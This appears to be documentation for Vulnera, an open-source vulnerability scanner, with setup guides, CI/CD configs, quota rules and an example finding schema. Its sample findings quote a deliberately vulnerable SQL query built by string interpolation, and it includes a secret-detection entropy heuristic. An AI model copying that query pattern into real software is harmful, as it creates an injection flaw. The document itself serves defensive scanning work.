Vulnera — Modular Vulnerability Analysis Platform
Vulnera is an open-source, async Rust platform for multi-ecosystem vulnerability analysis. It combines four purpose-built detection modules under a single orchestrator with sandboxed execution, a typed job pipeline, and optional LLM enrichment.
All core analysis — SAST, secrets detection, and API security — runs fully offline. Dependency CVE lookups require network access to OSV, NVD, and GHSA. LLM enrichment requires network access to the configured provider.
The Four Analysis Modules
| Module | Method | Coverage | Offline? |
|---|---|---|---|
| Dependency Analysis | CVE lookup (OSV · NVD · GHSA) | npm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet | ❌ No |
| SAST | Tree-sitter AST + inter-procedural taint analysis | Python, JavaScript, TypeScript, Rust, Go, C, C++ | ✅ Yes |
| Secrets Detection | Regex + entropy detection | All text files | ✅ Yes |
| API Security | Rule-based OpenAPI spec analysis | OpenAPI 3.0 / 3.1 | ✅ Yes |
LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is an optional post-processing pass — it adds explanations and fix suggestions to existing findings but is never part of detection.
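Of the detection methods above, entropy scoring is the least self-describing: random-looking strings (keys, tokens) have a high Shannon entropy per character, while ordinary repetitive text does not. A minimal Python sketch of the idea — the length and entropy thresholds here are illustrative, not Vulnera's actual cutoffs:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical character distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())

def looks_like_secret(token: str, threshold: float = 3.5) -> bool:
    # Hypothetical cutoffs: long tokens with near-random character spread.
    return len(token) >= 20 and shannon_entropy(token) > threshold

print(looks_like_secret("AKIAIOSFODNN7EXAMPLEKEY1"))   # True  (random-looking key)
print(looks_like_secret("passwordpasswordpassword"))   # False (repetitive, low entropy)
```

In practice entropy alone over-flags, which is why it is paired with regex patterns and context.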
Documentation Structure
Getting Started
Role-based quick-start guides:
- Developer Quick Start — run your first scan locally in under 5 minutes
- DevSecOps Quick Start — CI/CD integration, team setup, policy gates
- Cloud Engineer Quick Start — repository scanning, S3 buckets, infrastructure
Analysis Capabilities
- Overview — module selection, offline vs. online, unified finding schema
- AI-Assisted Code Analysis (SAST) — detection methods, language coverage, taint analysis internals
- AI-Assisted Secret Detection — entropy thresholds, baseline support, Git history scanning
Module Reference
- Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
- SAST — supported languages, rule packs, confidence scoring
- Secrets Detection — detection methods, secret types, baselines
- API Security — analysis categories, OAuth/OIDC checks, strict mode
AI-Powered Features
- LLM Explanations & Auto-Fixes — provider setup, quotas, caching
Dashboard & Web Platform
- Dashboard Guide — web UI overview
- Organization Management — teams, members, shared quota
- Team Collaboration — workflows for security teams
Reference
- Configuration — environment variable reference with defaults
- System Architecture — DDD layering, composition root, cache architecture
- Orchestrator Observability — job lifecycle event model, instrumentation strategy
- FAQ — quota, offline capabilities, false positives, troubleshooting
Offline vs. Online Boundaries
Fully offline (no network required):
- SAST
- Secrets Detection
- API Security
Requires network:
- Dependency Analysis (OSV/NVD/GHSA lookups)
- LLM enrichment (explanations and fixes)
Self-Hosting
The server is a single Rust binary backed by PostgreSQL and optionally Dragonfly/Redis.
Minimum requirements:
- Rust 1.91+ (build only)
- PostgreSQL 12+
- Linux 5.13+ recommended (for Landlock sandbox; process isolation fallback works on older kernels)
export DATABASE_URL='postgresql://user:pass@localhost:5432/vulnera'
sqlx migrate run
cargo run
Full configuration reference: Configuration
License
Server and all analysis modules: AGPL-3.0-or-later
CLI, Advisors, LSP Adapter: AGPL-3.0-or-later (see each workspace’s LICENSE file)
Contributing
See the project README for the contribution guide, roadmap, and high-impact areas open for community work.
Developer Quick Start (5 Minutes)
For: Individual developers who want offline vulnerability scanning integrated into their workflow.
Goal: Run your first security analysis on a local project in under 5 minutes.
Install Vulnera CLI
Choose your platform:
macOS
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-macos-aarch64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/
Linux
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/
Windows
Download from GitHub Releases, add to PATH.
Verify Installation
vulnera --version
# Output: Vulnera 0.5.1
Run Your First Analysis (Offline)
# Analyze your current project
vulnera analyze .
# Or any directory
vulnera analyze /path/to/my/nodejs-app
What happens:
- ✅ Scans all code files for security issues
- ✅ Detects hardcoded secrets (API keys, tokens, credentials)
- ✅ Checks for code injection vulnerabilities
- ✅ Analyzes OpenAPI specs if present
- ⏱️ Takes 1-10 seconds depending on project size
Output (default table view):
┌────────────────────────────────────────────────────────────┐
│ Vulnera Security Analysis Report │
├────────────────────────────────────────────────────────────┤
│ Analysis Duration: 2.3 seconds │
│ Modules Run: SAST, Secrets, API │
│ Total Findings: 5 │
├────────────────────────────────────────────────────────────┤
│ SEVERITY │ COUNT │ MODULE │ REMEDIATION │
├──────────┼───────┼───────────────┼──────────────────────────┤
│ HIGH │ 2 │ Secrets │ Remove hardcoded keys │
│ MEDIUM │ 2 │ SAST (Python) │ Use parameterized queries│
│ LOW │ 1 │ API Spec │ Add security headers │
└────────────────────────────────────────────────────────────┘
See Detailed Findings
vulnera analyze . --format json | jq '.findings[]'
Sample finding:
{
  "id": "SAST-SQL-001",
  "type": "SQL Injection",
  "severity": "high",
  "file": "app.py",
  "line": 42,
  "message": "User input concatenated into SQL query",
  "code": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
  "remediation": "Use parameterized queries: db.query('SELECT * FROM users WHERE id=?', [user_id])"
}
Get AI-Powered Explanations
Want to understand why a finding is important?
# Option 1: Output directly shows summaries
vulnera analyze . --format table
# Option 2: Export to JSON and filter
vulnera analyze . --format json | jq '.findings[] | {id, type, message, remediation}'
Authenticate for Extra Features
Get 4x more quota and enable dependency scanning:
# Get API key at: https://vulnera.studio/dashboard/keys
vulnera auth login --api-key YOUR_API_KEY
# Now you can scan dependencies
vulnera analyze . --all-modules
Pre-Commit Integration
Automatically scan before commits:
Add to .git/hooks/pre-commit
#!/bin/sh
# Run Vulnera analysis on the working tree (not just staged files)
vulnera analyze . --severity high
if [ $? -ne 0 ]; then
echo "❌ Security issues found. Fix before committing."
exit 1
fi
Make it Executable
chmod +x .git/hooks/pre-commit
Test It
git add .
git commit -m "test"
# Will run Vulnera scan before commit
CI/CD Integration
GitHub Actions
Create .github/workflows/security.yml:
name: Security Analysis
on: [push, pull_request]
jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Vulnera CLI
        run: |
          curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
          chmod +x vulnera
      - run: ./vulnera analyze . --severity high
GitLab CI
Add to .gitlab-ci.yml:
security:
  script:
    - curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
    - chmod +x vulnera
    - ./vulnera analyze . --severity high
Common Commands
# Analyze only secrets (skip code analysis)
vulnera analyze . --skip-sast
# Show only high/critical severity
vulnera analyze . --severity high
# Export to SARIF (for IDE integration)
vulnera analyze . --format sarif > report.sarif
# Check your quota
vulnera quota
# Offline mode (don't use dependency scanning)
vulnera analyze . --offline
Next Steps
- Integrate into your IDE → IDE Extensions
- Learn about all analysis types → Analysis Capabilities
- Get AI-powered explanations → LLM Features
- Setup for team usage → DevSecOps Quick Start
Troubleshooting
Q: No findings found—is it working?
A: Possibly — it means no issues were detected at your current settings. Run with --show-passed to confirm which checks actually executed.
Q: Getting “permission denied” error?
A: Make sure the binary is executable: chmod +x vulnera
Q: Want to see what’s detected?
A: Run with verbose output: vulnera analyze . -v
Q: Dependency scanning not working?
A: You need to authenticate. Get an API key at https://vulnera.studio/dashboard/keys
Questions? Join us on Discord or check the full documentation.
DevSecOps Quick Start (10 Minutes)
For: Security team leads and DevSecOps engineers managing organization-wide vulnerability scanning.
Goal: Set up team-based security scanning with shared quotas, analytics, and multi-project orchestration.
Step 1: Create Organization
vulnera organizations create \
--name "Engineering Security Team" \
--description "Security scanning for all projects"
Output:
Organization created: org-abc123
Shared daily quota: 48 tokens (vs 40 for single user)
Admin URL: https://vulnera.studio/orgs/org-abc123/settings
Step 2: Invite Team Members
# Invite security engineer
vulnera organizations add-member \
--org org-abc123 \
--email alice@company.com \
--role admin
# Invite developer with view-only access
vulnera organizations add-member \
--org org-abc123 \
--email bob@company.com \
--role viewer
Roles
| Role | Capabilities |
|---|---|
| Owner | Create/delete org, manage members, billing, analytics |
| Admin | Run scans, manage members, view analytics |
| Analyst | Run scans, view results, comment on findings |
| Viewer | View-only access to results and analytics |
Step 3: Setup Continuous Scanning
GitHub Organization Integration
# Store Vulnera API key as GitHub secret
# Go to Settings → Secrets and variables → Actions → New repository secret
# Name: VULNERA_API_KEY
# Value: (get from vulnera dashboard)
Create .github/workflows/vulnera-scan.yml:
name: Vulnera Security Scan
on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]
  schedule:
    - cron: "0 2 * * *" # Daily at 2 AM
jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Download Vulnera CLI
        run: |
          curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
          chmod +x vulnera
      - name: Run Full Security Analysis
        env:
          VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
        run: |
          ./vulnera analyze . \
            --all-modules \
            --format json \
            --output vulnera-report.json
      - name: Report Results
        run: |
          ./vulnera report vulnera-report.json \
            --format github \
            --post-to-pr
Step 4: View Organization Analytics
# Get team usage summary
vulnera organizations analytics dashboard --org org-abc123
# Get historical usage (last 3 months)
vulnera organizations analytics usage --org org-abc123 --months 3
Sample output:
Organization: Engineering Security Team
Period: December 2024
Daily Usage Trend:
Dec 1: ▄ 28 tokens (58%)
Dec 2: █ 47 tokens (98%) ← Peak
Dec 3: ▂ 12 tokens (25%)
Avg: ▃ 31 tokens (65%)
Per-Member Breakdown:
Alice (alice@company.com): 156 tokens (52%)
Bob (bob@company.com): 89 tokens (30%)
Charlie (charlie@...): 54 tokens (18%)
Recommendations:
- High usage on Dec 2. Consider optimizing batch operations.
- LLM features used 45% of quota. See quota-pricing.md for cost details.
Step 5: Create Shared Scanning Policies
Severity Filters
# Define which issues to alert on
vulnera organizations policy create \
--org org-abc123 \
--name "Production Policy" \
--min-severity critical,high \
--affected-projects "*-prod"
Exemptions
# Exclude known false positives
vulnera organizations policy exempt \
--org org-abc123 \
--finding-id SAST-SQL-001 \
--reason "Legacy code, deprecated but functional" \
--expires 2025-06-30
Step 6: Setup Notifications
Slack Integration
# Get Vulnera webhook URL from dashboard
vulnera organizations integrations connect slack \
--org org-abc123 \
--webhook-url https://hooks.slack.com/services/YOUR/WEBHOOK/URL
Notification Rules
# Alert on any critical finding
vulnera organizations notifications create \
--org org-abc123 \
--name "Critical Alerts" \
--condition "severity == critical" \
--channel slack
# Weekly summary
vulnera organizations notifications create \
--org org-abc123 \
--name "Weekly Summary" \
--condition "summary" \
--frequency weekly \
--channel email
Step 7: Scan Multiple Repositories
# Create scanning profile
vulnera organizations profile create \
--org org-abc123 \
--name "Standard Scan" \
--modules "sast,secrets,deps,api" \
--severity-threshold "high"
# Scan repositories
vulnera scan-repos \
--org org-abc123 \
--profile "Standard Scan" \
--repos "my-org/repo-1,my-org/repo-2,my-org/repo-3"
Step 8: Monitor and Report
Dashboard View
# Open web dashboard
open https://vulnera.studio/orgs/org-abc123/dashboard
Shows:
- Real-time scan status
- Vulnerability trends
- Team member activity
- Quota usage
- Historical comparisons
Export Reports
# Export findings to compliance format
vulnera organizations report export \
--org org-abc123 \
--format sarif \
--period "last-month" \
--output compliance-report.sarif
# Email to stakeholders
vulnera organizations report email \
--org org-abc123 \
--recipients security-team@company.com \
--include-recommendations
Quota Management for Teams
Shared Quota Model
Organization Daily Quota: 48 tokens
Typical usage:
Monday (high activity): 45 tokens
Tuesday (low activity): 8 tokens
Wednesday-Friday (average): 20 tokens each
Weekly pattern: Usually peaks Monday, dips on weekends
Recommendation: Schedule large scans Monday morning
Cost Optimization
# Only scan high/critical severity to save quota
vulnera analyze . --severity high
# Batch LLM explanations (costs 6 tokens total vs 6 per finding)
vulnera analyze . --batch-llm-enrich
# Organizations get a +20% shared quota (48 tokens vs 40 individual)
Integration Examples
Jira Integration
Auto-create Jira tickets for high-severity findings:
vulnera organizations integrations connect jira \
--org org-abc123 \
--jira-url https://company.atlassian.net \
--api-token YOUR_TOKEN \
--auto-create-issues \
--severity-threshold high
Datadog/New Relic APM
Send security metrics to monitoring:
vulnera organizations integrations connect datadog \
--org org-abc123 \
--api-key YOUR_DATADOG_KEY \
--send-metrics \
--metric-tags "team:security,env:prod"
Common Workflows
Scan on Every Push
# GitHub Actions workflow (see Step 3)
# Results appear as GitHub check
# PR comments show new findings
# Auto-block PRs with critical issues (optional)
Scan on Merge Request
# GitLab CI pipeline
# Results in MR discussion
# Approve/block based on findings
Weekly Security Reports
# Cron job to generate reports
0 9 * * 1 vulnera report generate --org org-abc123 --email security@company.com
Monitoring & Alerting
# Setup alert for quota approaching limit
vulnera organizations alerts create \
--org org-abc123 \
--alert "quota_threshold" \
--threshold 90 \
--action "email-admin"
# Alert on policy violations
vulnera organizations alerts create \
--org org-abc123 \
--alert "policy_violation" \
--action "slack-notification"
Next Steps
- Understand quota costs → Quota & Pricing
- Create custom analysis policies → Policy Configuration
Need help? Contact support or join our security community Discord.
Quota & Pricing
This document explains how local CLI quotas and server rate limits work, and how they differ.
Two Separate Systems
1) CLI Local Quota (Per Machine)
The CLI enforces a local daily request limit and persists usage on the machine.
Limits (CLI):
- Unauthenticated: 10 requests/day
- Authenticated (API key): 40 requests/day
Where this lives:
- Stored locally by the CLI (per machine)
- Reset at UTC midnight
- Check status with vulnera quota
Commands:
vulnera auth status
vulnera quota
vulnera quota sync
Notes:
- The CLI quota is a local guardrail and can be synced with server state if the server is reachable.
- Offline mode uses local quota only.
2) Server Rate Limits (API)
The server enforces tiered rate limits and token costs per request. This is authoritative for hosted/self-hosted API usage.
Default tiers (from config/default.toml):
- API key: 100 req/min, 2000 req/hour, burst 20
- Authenticated (cookie): 60 req/min, 1000 req/hour, burst 10
- Anonymous: 10 req/min, 100 req/hour, burst 5
- Org bonus: +20% to tier limits
Token cost weights (per request):
- GET = 1
- POST/PUT/DELETE = 2
- Analysis = 3
- LLM = 6
These costs apply to the server-side rate limiter, not the CLI local tracker.
Practical Examples
CLI (Local)
- vulnera analyze . → consumes 1 local request
- vulnera deps . → consumes 1 local request + server usage
Server (API)
- POST /api/v1/analyze/job → cost analysis = 3
- POST /api/v1/llm/explain → cost llm = 6
- GET /api/v1/quota → cost get = 1
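As a worked example, the cost weights above can be applied to a day's traffic to estimate server-side token consumption (a back-of-the-envelope sketch; the real limiter also applies per-minute and per-hour tier limits):

```python
# Server-side cost weights, taken from the rate limiter defaults above.
COSTS = {"get": 1, "mutate": 2, "analysis": 3, "llm": 6}

def day_cost(requests: dict[str, int]) -> int:
    """Total tokens consumed by a day's worth of API requests."""
    return sum(COSTS[kind] * count for kind, count in requests.items())

# 10 GETs + 4 analysis jobs + 2 LLM enrichments:
print(day_cost({"get": 10, "analysis": 4, "llm": 2}))  # 10*1 + 4*3 + 2*6 = 34
```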
How to Check Usage
CLI (Local)
vulnera quota
Server (API)
curl https://api.vulnera.studio/api/v1/quota \
-H "X-API-Key: <your_api_key>"
Configuration (Server)
Server limits live in config/default.toml:
- server.rate_limit.tiers.* for rate tiers
- server.rate_limit.costs.* for request cost weights
- server.rate_limit.tiers.org_bonus_percent for the organization bonus
Override with environment variables using the VULNERA__ prefix.
Guidance
- Use the CLI locally for offline modules (SAST, Secrets, API).
- Use server-backed analysis for dependency scanning and LLM features.
- Batch LLM enrichment to reduce total cost.
Troubleshooting
Local CLI says quota exceeded
- Wait for UTC reset or authenticate for 40/day
- Run vulnera auth login, then check with vulnera quota
Server returns 429
- You’ve exceeded the configured server tier limits
- Reduce request volume or increase limits in server config
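When scripting against the API, a client can also recover from 429s by backing off and retrying. A small Python sketch of that pattern — the (status, retry_after, body) call shape is an invention for this example, not the Vulnera client API:

```python
import time

def with_backoff(call, max_retries: int = 5, base_delay: float = 1.0,
                 sleep=time.sleep):
    """Retry `call` on 429 responses with exponential backoff.

    `call` returns a (status, retry_after_seconds_or_None, body) triple —
    a hypothetical shape used only for this sketch.
    """
    for attempt in range(max_retries):
        status, retry_after, body = call()
        if status != 429:
            return body
        # Honour Retry-After when provided, otherwise back off exponentially.
        sleep(retry_after if retry_after is not None else base_delay * 2 ** attempt)
    raise RuntimeError("rate limited: retries exhausted")

# Simulated endpoint: rate-limited twice, then succeeds.
responses = iter([(429, 1, None), (429, None, None), (200, None, "ok")])
print(with_backoff(lambda: next(responses), sleep=lambda s: None))  # ok
```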
Cloud Engineer Quick Start (10 Minutes)
For: Cloud/infrastructure engineers scanning S3 buckets, repositories, and cloud-hosted projects.
Goal: Scan cloud resources at scale with automated workflows.
Step 1: Install & Authenticate
# Install CLI
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
# Authenticate with API key (get from https://vulnera.studio/dashboard/keys)
vulnera auth login --api-key YOUR_API_KEY
Step 2: Scan S3 Buckets
Scan Single Bucket
vulnera analyze s3://my-bucket/src \
--aws-profile default \
--recursive
Scan Multiple Buckets
# Create scanning config
cat > s3-scan-config.toml << EOF
[buckets]
include_patterns = ["prod-*", "app-*"]
exclude_patterns = ["archive-*", "temp-*"]
max_file_size = 1000000 # 1MB
EOF
vulnera analyze-cloud s3 \
--config s3-scan-config.toml \
--format json \
--output s3-findings.json
AWS Credentials
# Use AWS profile
export AWS_PROFILE=production
vulnera analyze s3://production-bucket/
# Or explicit credentials
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
vulnera analyze s3://my-bucket/
Step 3: Scan GitHub Repositories
Single Repository
vulnera analyze github://owner/repo \
--branch main \
--depth full
Organization-Wide Scan
# Scan all repositories in organization
vulnera scan-repos \
--source github \
--org my-company \
--visibility public,private \
--output org-findings.json
Exclude Patterns
vulnera scan-repos \
--source github \
--org my-company \
--exclude "tests/*,vendor/*,node_modules/*" \
--max-file-size 1000000
Step 4: Cloud-Native CI/CD Pipelines
AWS CodePipeline
# buildspec.yml
version: 0.2
phases:
  install:
    commands:
      - curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
      - chmod +x vulnera
  build:
    commands:
      - ./vulnera analyze . --all-modules --format json --output vulnera-findings.json
      - ./vulnera report vulnera-findings.json --format codepipeline
artifacts:
  files:
    - vulnera-findings.json
Azure Pipelines
trigger:
  - main
pool:
  vmImage: 'ubuntu-latest'
steps:
  - task: DownloadSecureFile@1
    inputs:
      secureFile: 'vulnera-api-key'
  - script: |
      curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
      chmod +x vulnera
      ./vulnera auth login --api-key $(cat $(Agent.TempDirectory)/vulnera-api-key)
      ./vulnera analyze . --all-modules
  - task: PublishBuildArtifacts@1
    inputs:
      pathToPublish: 'vulnera-findings.json'
GCP Cloud Build
steps:
  - name: 'gcr.io/cloud-builders/docker'
    args:
      - 'build'
      - '-t'
      - 'gcr.io/$PROJECT_ID/vulnera-scanner'
      - '.'
  - name: 'gcr.io/$PROJECT_ID/vulnera-scanner'
    env:
      - 'VULNERA_API_KEY=$_VULNERA_API_KEY'
    args:
      - 'analyze'
      - '/workspace'
      - '--all-modules'
      - '--format'
      - 'json'
Step 5: Kubernetes & Container Scanning
Scan Docker Images
# Before pushing to registry
docker run -v /path/to/app:/app vulnera-scanner \
analyze /app \
--all-modules \
--severity high
Kubernetes Deployment
# kubernetes-job.yaml
apiVersion: batch/v1
kind: CronJob
metadata:
  name: vulnera-scanner
spec:
  schedule: "0 2 * * *" # 2 AM daily
  jobTemplate:
    spec:
      template:
        spec:
          containers:
            - name: vulnera
              image: vulnera-scanner:latest
              env:
                - name: VULNERA_API_KEY
                  valueFrom:
                    secretKeyRef:
                      name: vulnera-credentials
                      key: api-key
              command:
                - sh
                - -c
                - |
                  vulnera analyze /source --all-modules --format json > /results/findings.json
                  vulnera report /results/findings.json --format kubernetes
              volumeMounts:
                - name: source
                  mountPath: /source
                - name: results
                  mountPath: /results
          volumes:
            - name: source
              emptyDir: {}
            - name: results
              persistentVolumeClaim:
                claimName: scan-results-pvc
          restartPolicy: OnFailure
Step 6: Terraform Scanning
Scan Infrastructure Code
# Scan Terraform modules for security issues
vulnera analyze ./terraform \
--format json \
--output tf-findings.json
# Filter by resource type
vulnera findings filter \
--input tf-findings.json \
--resource-type aws_security_group \
--output sg-issues.json
Terraform Module Registry Integration
# main.tf
module "vulnera_scan" {
source = "git::https://github.com/Vulnera-rs/Vulnera.git//terraform/modules/scanner"
bucket_name = "my-infrastructure"
schedule = "cron(0 2 * * ? *)" # Daily at 2 AM
tags = {
Environment = "production"
}
}
Step 7: Multi-Cloud Scanning
Scan All Cloud Resources
# Scan across multiple cloud providers
vulnera scan-cloud \
--providers aws,azure,gcp \
--config multi-cloud-config.toml \
--parallel 10
# Results aggregated by resource type
vulnera report cloud-findings.json \
--group-by provider \
--format html
Configuration Example
[aws]
regions = ["us-east-1", "us-west-2", "eu-west-1"]
include_s3 = true
include_ec2_images = true
include_rds = true
[azure]
subscriptions = ["prod", "staging"]
include_storage = true
[gcp]
projects = ["project-prod", "project-staging"]
include_storage = true
Step 8: Automated Compliance Reporting
Generate Compliance Reports
# SOC 2 Report
vulnera report generate \
--format soc2 \
--period month \
--include-trends \
--output soc2-compliance.html
# HIPAA Report
vulnera report generate \
--format hipaa \
--include-remediation \
--output hipaa-compliance.html
Email Reports Automatically
# Schedule weekly reports
vulnera organizations notifications create \
--org my-cloud-team \
--name "Weekly Cloud Security" \
--frequency weekly \
--day monday \
--time 9:00 \
--recipients security@company.com
Common Cloud Workflows
Daily S3 Compliance Check
#!/bin/bash
# daily-s3-scan.sh
BUCKET="production-data"
DATE=$(date +%Y-%m-%d)
REPORT_DIR="/var/reports/vulnera"
vulnera analyze s3://${BUCKET} \
--recursive \
--format json \
--output ${REPORT_DIR}/${DATE}-findings.json
# Alert if critical findings
CRITICAL_COUNT=$(jq '[.findings[] | select(.severity=="critical")] | length' ${REPORT_DIR}/${DATE}-findings.json)
if [ $CRITICAL_COUNT -gt 0 ]; then
echo "Critical findings in $BUCKET: $CRITICAL_COUNT" | \
mail -s "ALERT: S3 Security Issues" security@company.com
fi
Multi-Region Analysis
# Parallel scanning across regions
for region in us-east-1 us-west-2 eu-west-1; do
vulnera analyze-cloud s3 \
--region $region \
--output findings-${region}.json &
done
wait
Performance Optimization
Parallel Processing
# Scan multiple buckets in parallel
vulnera analyze-cloud s3 \
--parallel-jobs 10 \
--max-file-workers 8
Caching
# Enable caching (24-hour default)
vulnera analyze s3://bucket \
--cache enabled \
--cache-ttl 86400
Large Scale Scans
# For enterprise environments
vulnera analyze-cloud \
--batch-size 1000 \
--queue-depth 500 \
--workers 32 \
--output enterprise-findings.json
Next Steps
- Setup organization for team coordination → DevSecOps Quick Start
- Understand quota for large-scale scans → Quota & Pricing
Need enterprise support? Contact sales@vulnera.studio
Analysis Capabilities Overview
Vulnera provides four specialized analysis modules powered by purpose-built detection techniques. Each module is independently selectable and produces findings in a unified schema.
The Four Analysis Modules
| Module | Purpose | Method | Offline? | Coverage |
|---|---|---|---|---|
| Dependency Analysis | Find known CVEs in third-party packages | Registry lookup (OSV · NVD · GHSA) | ❌ No | npm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet |
| SAST | Find security flaws in source code | Tree-sitter AST + inter-procedural taint analysis | ✅ Yes | Python, JavaScript, TypeScript, Rust, Go, C, C++ |
| Secrets Detection | Find exposed credentials and tokens | Regex + entropy detection | ✅ Yes | All text files |
| API Security | Find misconfigurations in API specs | Rule-based spec analysis | ✅ Yes | OpenAPI 3.0 / 3.1 |
LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is a separate post-processing pass that explains and proposes fixes for findings produced by the modules above. It is never part of detection and requires network access.
How Module Selection Works
The orchestrator uses RuleBasedModuleSelector to automatically activate modules based on file patterns and analysis depth. You do not need to specify modules manually — the right ones run based on what is in the project.
Incoming source (directory / git / S3)
│
▼
File pattern detection
│
├─ dependency manifests found? → Dependency Analysis
├─ .py / .js / .ts / .rs / .go / .c / .cpp files? → SAST
├─ all files → Secrets Detection (always runs in Full)
└─ openapi.yaml / openapi.json / swagger.yaml found? → API Security
│
▼
Parallel execution (one sandbox per module)
│
▼
Aggregated findings report
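The flow above can be sketched as a small rule table mapping file patterns to modules. This is a deliberate simplification of RuleBasedModuleSelector; the pattern sets below are taken from the diagram and are illustrative, not the selector's real configuration:

```python
from pathlib import PurePosixPath

# Illustrative pattern sets, taken from the selection diagram above.
CODE_EXTS = {".py", ".js", ".ts", ".rs", ".go", ".c", ".cpp"}
MANIFESTS = {"package.json", "requirements.txt", "Cargo.toml", "go.mod", "pom.xml"}
API_SPECS = {"openapi.yaml", "openapi.json", "swagger.yaml"}

def select_modules(files: list[str]) -> set[str]:
    """Map file patterns to analysis modules, mirroring the flow above."""
    modules = {"secrets"}  # secrets detection always runs in a full analysis
    for f in files:
        path = PurePosixPath(f)
        if path.name in MANIFESTS:
            modules.add("deps")
        if path.suffix in CODE_EXTS:
            modules.add("sast")
        if path.name in API_SPECS:
            modules.add("api")
    return modules

print(sorted(select_modules(["src/app.py", "package.json", "docs/openapi.yaml"])))
# ['api', 'deps', 'sast', 'secrets']
```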
Analysis Depth (Orchestrator)
The orchestrator uses a coarse analysis depth to decide which modules to run:
| Depth | Description | Modules |
|---|---|---|
| dependencies_only | Dependencies only | deps |
| fast_scan | Fast scan (dependencies + minimal code analysis) | deps + sast |
| full | Full analysis (all applicable modules) | deps + sast + secrets + api |
Note: Module coverage still depends on project content. For example, SAST only runs if supported source files are present, and API Security only runs if an OpenAPI spec is detected.
Analysis Depth (SAST)
The SAST module has its own depth semantics (separate from orchestrator depth):
| Depth | Description |
|---|---|
| quick | Fast pattern matching only (no data-flow analysis) |
| standard | Balanced analysis (patterns + intra-procedural data flow) |
| deep | Full analysis (patterns + data flow + call graph + inter-procedural) |
Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable via VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.
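The downgrade behaviour can be sketched as a size-based policy. The thresholds below are invented for illustration; the real file/size limits come from the SAST configuration:

```python
def effective_depth(requested: str, file_count: int,
                    standard_max: int = 5_000, quick_max: int = 20_000) -> str:
    """Downgrade the requested SAST depth on large repositories.

    standard_max / quick_max are hypothetical thresholds; Vulnera reads its
    real limits from configuration (dynamic_depth_enabled and friends).
    """
    order = ["quick", "standard", "deep"]
    if file_count <= standard_max:
        allowed = "deep"
    elif file_count <= quick_max:
        allowed = "standard"
    else:
        allowed = "quick"
    # Never exceed what was requested; pick the shallower of the two.
    return min(requested, allowed, key=order.index)

print(effective_depth("deep", 12_000))  # downgraded to 'standard'
```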
Offline vs. Online Capabilities
Fully offline (no network required)
- SAST — rule packs embedded at compile time
- Secrets Detection — regex + entropy detection locally
- API Security — OpenAPI rules locally
Requires network
- Dependency Analysis — CVE lookup against OSV, NVD, GHSA, and registries
- LLM enrichment — explanations and fixes via external providers
Unified Finding Schema
Every module emits findings in the same structure:
{
  "id": "SAST-PY-SQL-001",
  "type": "vulnerability",
  "rule_id": "python-sql-injection",
  "location": {
    "path": "src/db.py",
    "line": 42,
    "column": 5,
    "end_line": 42,
    "end_column": 48
  },
  "severity": "high",
  "confidence": "high",
  "description": "User input concatenated directly into SQL query.",
  "recommendation": "Use parameterized queries or a query builder.",
  "secret_metadata": null,
  "vulnerability_metadata": {
    "snippet": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
    "bindings": null,
    "semantic_path": null
  },
  "enrichment": null
}
The enrichment field is populated only when LLM enrichment is requested after analysis; secret_metadata is only present for secret findings.
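Because every module shares this schema, downstream tooling can filter findings without per-module logic. A sketch of a severity gate over the unified fields (the finding IDs here are made up for the example):

```python
# Severity gate over the unified finding schema; works for any module's output.
SEVERITY_ORDER = ["low", "medium", "high", "critical"]

def at_least(findings: list[dict], min_severity: str) -> list[dict]:
    """Keep findings at or above min_severity, regardless of source module."""
    floor = SEVERITY_ORDER.index(min_severity)
    return [f for f in findings if SEVERITY_ORDER.index(f["severity"]) >= floor]

findings = [
    {"id": "SAST-PY-SQL-001", "severity": "high"},
    {"id": "SECRET-AWS-001", "severity": "critical"},
    {"id": "API-HDR-003", "severity": "low"},
]
print([f["id"] for f in at_least(findings, "high")])
# ['SAST-PY-SQL-001', 'SECRET-AWS-001']
```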
Module-Specific Documentation
- Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
- SAST — supported languages, rule packs, taint analysis, confidence scoring
- Secrets Detection — detection methods, secret types, baselines
- API Security — analysis categories, detected issue types, strict mode
Dependency Analysis
The Dependency Analysis module scans dependency manifests and lockfiles across multiple ecosystems to identify known vulnerabilities. It requires network access for CVE lookups (OSV, NVD, GHSA).
Supported Ecosystems
| Ecosystem | Files |
|---|---|
| Python (PyPI) | requirements.txt, Pipfile, pyproject.toml |
| Node.js (npm) | package.json, package-lock.json, yarn.lock |
| Java (Maven/Gradle) | pom.xml, build.gradle |
| Rust (Cargo) | Cargo.toml, Cargo.lock |
| Go | go.mod, go.sum |
